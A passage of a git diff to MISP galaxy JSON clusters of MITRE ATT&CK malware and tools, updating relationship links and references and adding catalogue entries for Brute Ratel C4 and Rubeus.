"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
"tags": [
@@ -58141,6 +60948,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
"tags": [
@@ -58148,6 +60969,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"tags": [
@@ -58162,6 +60997,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
"tags": [
@@ -58169,6 +61011,27 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -58197,6 +61060,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
"tags": [
@@ -58259,6 +61129,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -58441,6 +61318,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -58649,13 +61533,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -58664,14 +61541,14 @@
"type": "uses"
},
{
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -58705,13 +61582,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
"tags": [
@@ -58760,6 +61630,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "215d9700-5881-48b8-8265-6449dbb7195d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
"tags": [
@@ -58823,13 +61700,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -59407,6 +62277,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -59448,13 +62325,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "1492d0f8-7e14-4af3-9239-bc3fe10d3407",
@@ -59622,13 +62492,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"tags": [
@@ -59911,7 +62774,7 @@
"https://attack.mitre.org/software/S0387",
"https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
"https://citizenlab.ca/2016/11/parliament-keyboy/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
+ "https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html"
],
"synonyms": [
"KeyBoy"
@@ -60085,13 +62948,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -60119,7 +62975,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0388",
- "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf"
+ "https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf"
],
"synonyms": [
"YAHOYAH"
@@ -62915,14 +65771,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -63081,6 +65937,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
"tags": [
@@ -63130,13 +65993,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
"tags": [
@@ -63165,6 +66021,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -65087,6 +67950,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -65900,6 +68770,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -67126,7 +70003,7 @@
"value": "BusyGasper - S0655"
},
{
- "description": "[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)",
+ "description": "[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)",
"meta": {
"external_id": "S0565",
"mitre_platforms": [
@@ -67848,6 +70725,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -68908,7 +71792,7 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -69201,10 +72085,10 @@
],
"refs": [
"https://attack.mitre.org/software/S0596",
- "https://content.fireeye.com/apt-41/rpt-apt41",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf",
- "https://securelist.com/shadowpad-in-corporate-networks/81432/"
+ "https://securelist.com/shadowpad-in-corporate-networks/81432/",
+ "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf"
],
"synonyms": [
"ShadowPad",
@@ -69212,6 +72096,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -69641,7 +72532,7 @@
"value": "Penquin - S0587"
},
{
- "description": "[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)",
+ "description": "[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)",
"meta": {
"external_id": "S0597",
"mitre_platforms": [
@@ -69800,7 +72691,7 @@
"value": "Waterbear - S0579"
},
{
- "description": "[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)",
+ "description": "[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)",
"meta": {
"external_id": "S0588",
"mitre_platforms": [
@@ -69943,7 +72834,7 @@
"value": "GoldMax - S0588"
},
{
- "description": "[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)",
+ "description": "[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024).(Citation: MSTIC NOBELIUM Mar 2021)",
"meta": {
"external_id": "S0589",
"mitre_platforms": [
@@ -69972,6 +72863,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
"tags": [
@@ -70036,14 +72934,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -70242,6 +73140,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -70680,6 +73585,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -70882,13 +73794,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -70910,6 +73815,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -71681,7 +74593,7 @@
"value": "Meteor - S0688"
},
{
- "description": "[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)",
+ "description": "[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)",
"meta": {
"external_id": "S0689",
"mitre_platforms": [
@@ -71761,6 +74673,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
"tags": [
@@ -72024,5 +74943,5 @@
"value": "HermeticWizard - S0698"
}
],
- "version": 28
+ "version": 29
}
diff --git a/clusters/mitre-tool.json b/clusters/mitre-tool.json
index bd8c675..964aa97 100644
--- a/clusters/mitre-tool.json
+++ b/clusters/mitre-tool.json
@@ -37,6 +37,262 @@
"uuid": "242f3da3-4425-4d11-8f5c-b842886da966",
"value": "Windows Credential Editor - S0005"
},
+ {
+ "description": "[Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)",
+ "meta": {
+ "external_id": "S1063",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1063",
+ "https://bruteratel.com/",
+ "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
+ "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/",
+ "https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/",
+ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html"
+ ],
+ "synonyms": [
+ "Brute Ratel C4",
+ "BRc4"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ea4c2f9c-9df1-477c-8c42-6da1118f2ac4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "75d8b521-6b6a-42ff-8af3-d97e20ce12a5",
+ "value": "Brute Ratel C4 - S1063"
+ },
{
"description": "[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)",
"meta": {
@@ -1117,6 +1373,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
"tags": [
@@ -1211,6 +1474,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"tags": [
@@ -2292,6 +2562,64 @@
"uuid": "102c3898-85e0-43ee-ae28-62a0a3ed9507",
"value": "UACMe - S0116"
},
+ {
+ "description": "[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)",
+ "meta": {
+ "external_id": "S1071",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1071",
+ "https://github.com/GhostPack/Rubeus",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
+ ],
+ "synonyms": [
+ "Rubeus"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3986e7fd-a8e9-4ecb-bfc6-55920855912b",
+ "tags": [
